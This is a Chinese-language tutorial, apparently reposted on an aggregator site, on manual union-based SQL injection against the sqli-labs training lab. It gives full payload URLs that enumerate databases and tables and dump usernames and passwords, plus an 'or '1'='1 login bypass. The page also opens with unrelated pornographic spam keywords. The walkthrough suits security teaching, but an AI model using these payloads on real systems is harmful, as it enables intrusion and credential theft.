国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息

這篇具有很好參考價值的文章主要介紹了滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

SQL注入之核心語法講解

SQL實驗室第一關

前言

一、搭建sqli-labs實驗環(huán)境

下載sqli-labs到phpstudy的www目錄下
打開localhost/sqli-labs運行即可
滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息

二、SQL注入核心語法

1.構造萬能密碼和簡單構造注入

(1)注入語句
‘~’ 相當于16進制的0x7e
萬能密碼 'or ‘1’ ='1
’ and ‘1’=‘1
’ and 1=2 union select 1,user(),3- -+ 前面加’是為了閉合后面的’
(2)group_concat(string)

2.核心語法獲取數(shù)據(jù)庫信息

(1)SQL手工注入方法
select schema_name from information_schema.schemata(查庫)
select table_name from information_schema.tables where table_schema=庫名(查表)
select column_name from information_schema.colums where table_name=表名(查列)
select 列名 from 庫名.表名(查數(shù)據(jù))

例子:
查看數(shù)據(jù)庫
http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(schema_name) from information_schema.schemata)- -+
滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息
查看表
http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)- -+
滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息

查看表中的數(shù)據(jù)
http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(username,0x7e,password) from security.users)- -+
滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息
這里總結一些SQL注入查看信息
滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息
滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息
滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息
http://192.168.222.4/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,user(),3- -+

手工注入獲取數(shù)據(jù)庫信息內(nèi)容
http://192.168.222.4/sqli-labs/Less-1/?id=2’ order by 3- -+ 查看可用字段的長度
http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,3- -+
http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(schema_name) from information_schema.schemata)- -+ 查看數(shù)據(jù)庫

http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select concat_ws(‘~’,username,password)from security.users limit 0,1)- -+ 只會返回一個數(shù)據(jù)(查看表的數(shù)據(jù))

http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select concat_ws(0x7e,username,password)from security.users limit 0,1)

http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(username,0x7e,password)from security.users)- -+ 會返回所有數(shù)據(jù)

http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select database())- -+ 查看數(shù)據(jù)庫

總結

本次實驗簡單介紹SQL注入的一些簡單的核心語法查詢和注入,之后會介紹SQL注入的相關注入方法。文章來源地址http://www.zghlxwxcb.cn/news/detail-498816.html

到了這里,關于滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 【實訓04】數(shù)據(jù)庫SQL注入漏洞

    【實訓04】數(shù)據(jù)庫SQL注入漏洞

    ? 下載dvwa的時候其實已經(jīng)通過了,但建議全部做一下,后面的要用 git clone GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA) 注入的sql: 使用sql注入查詢數(shù)據(jù)庫用戶名和數(shù)據(jù)庫名,并將用戶名和數(shù)據(jù)庫名寫入/data/workspace/myshixun/result2中: 注入的sql語句: 使用sql注入查詢dvwa數(shù)據(jù)庫

    2024年02月16日
    瀏覽(19)
  • 【數(shù)據(jù)庫】SQL注入從0到1

    【數(shù)據(jù)庫】SQL注入從0到1

    目錄 前言: 1.【入門】普通查詢型注入: 1.0 實驗環(huán)境: 1.1進行一次普通的查詢: 1.2 進行注入得到用戶信息: 1.2.1 執(zhí)行注入: 1.2.2 注入語句分析: 1.3 整型注入與字符型注入?yún)^(qū)別: 2.【進階】從庫到列逐步注入: 2.1 預備知識: 2.1.1 union函數(shù): 2.1.2 order by函數(shù): 2.1.3 infor

    2024年02月05日
    瀏覽(25)
  • 數(shù)據(jù)庫概述SQL基本語法

    database簡稱DB: 存儲數(shù)據(jù)的倉庫,是以某種結構存儲數(shù)據(jù)的文件。指長期保存在計算機的存儲設備上,按照一定規(guī)則組織起來,可以被用戶或應用共享的數(shù)據(jù)集合。 用于創(chuàng)建,維護,使用數(shù)據(jù)庫的一種大型軟件系統(tǒng)。比如MySQL, Oracle, SQL server等等。 方式1:右鍵任務欄-任務管理

    2024年02月12日
    瀏覽(22)
  • Python MySQL 數(shù)據(jù)庫查詢:選擇數(shù)據(jù)、使用篩選條件、防止 SQL 注入

    Python MySQL 數(shù)據(jù)庫查詢:選擇數(shù)據(jù)、使用篩選條件、防止 SQL 注入

    要從MySQL中的表格中選擇數(shù)據(jù),請使用\\\"SELECT\\\"語句: 示例選擇\\\"customers\\\"表格中的所有記錄,并顯示結果: 注意 :我們使用 fetchall() 方法,該方法從上次執(zhí)行的語句中獲取所有行。 要僅選擇表格中的某些列,請使用\\\"SELECT\\\"語句,后跟列名: 示例僅選擇name和address列: 如果您只對

    2024年02月05日
    瀏覽(115)
  • 確保你的數(shù)據(jù)庫安全:如何防止SQL注入攻擊

    最近,越來越多的組織和公司受到SQL注入攻擊的困擾。這種攻擊可以導致數(shù)據(jù)庫中的敏感信息泄露,破壞數(shù)據(jù)完整性,甚至可能導致整個系統(tǒng)崩潰。如果您是一名數(shù)據(jù)庫管理員或網(wǎng)站管理員,您需要了解如何保護您的數(shù)據(jù)庫免受SQL注入攻擊的威脅。在本文中,小德將介紹什么

    2024年02月02日
    瀏覽(23)
  • web滲透之sql注入

    web滲透之sql注入

    博主姓名:擺爛陽 博主主頁面鏈接:傳送門 新人入圈,希望博主的內(nèi)容可以給大家?guī)韼椭腥魏螁栴}可以私信本人 擺爛陽從不擺爛滴 所謂SQL注入,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執(zhí)行惡意的SQL命令,比如先

    2023年04月08日
    瀏覽(15)
  • GaussDB高斯數(shù)據(jù)庫(SQL語法分類)

    GaussDB高斯數(shù)據(jù)庫(SQL語法分類)

    日常查詢中,最常用的是通過FROM子句實現(xiàn)的查詢。 語法格式:使用方法: SELECT [ , ... ] FROM table_reference [ , ... ] SELECT之后和FROM子句之前出現(xiàn)的表達式稱為SELECT項。SELECT項用于指定要查詢的列,F(xiàn)ROM指定要從哪個表中查詢。如果要查詢所有列,可以在SELECT后面使用*號,如

    2024年02月16日
    瀏覽(92)
  • GaussDB高斯數(shù)據(jù)庫(SQL語法入門)

    GaussDB高斯數(shù)據(jù)庫(SQL語法入門)

    DDL數(shù)據(jù)定于語言:用于定義或修改數(shù)據(jù)庫中的對象,如:表,索引,視圖,數(shù)據(jù)庫,序列,用戶,角色,表空間,會話等。 DDL不支持物化視圖,存儲過程,觸發(fā)器,自定義函數(shù),自定義類型。 DML數(shù)據(jù)操作語言:用于對數(shù)據(jù)庫表中的數(shù)據(jù)進行操作,如插入,更新和刪除。 DCL數(shù)

    2023年04月10日
    瀏覽(97)
  • 五、C#與數(shù)據(jù)庫交互( SQL注入與安全性)

    在C#與數(shù)據(jù)庫交互時,安全性是非常重要的一部分,特別是要防止SQL注入攻擊。SQL注入是一種常見的網(wǎng)絡攻擊手段,攻擊者通過在輸入字段中注入惡意SQL代碼來操縱數(shù)據(jù)庫查詢。以下是一些關于如何防止SQL注入的建議: 使用參數(shù)化查詢 : 這是防止SQL注入的最有效方法。參數(shù)化

    2024年02月02日
    瀏覽(29)
  • Web數(shù)據(jù)庫基本知識,SQL基本語法

    當我們談論整個技術棧時,實際上涉及了一系列步驟,而在Web開發(fā)中,這些步驟可以被具體化為以下幾個階段: DBMS-GUI-翻譯器-查詢語言 在web中具體如下: postgreSQL-Hasura-Apollo+ts-GraphQL 具體解釋 DBMS(數(shù)據(jù)庫管理系統(tǒng)): 作用: 數(shù)據(jù)庫管理系統(tǒng)允許我們直接使用SQL語言來操作數(shù)

    2024年02月03日
    瀏覽(63)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包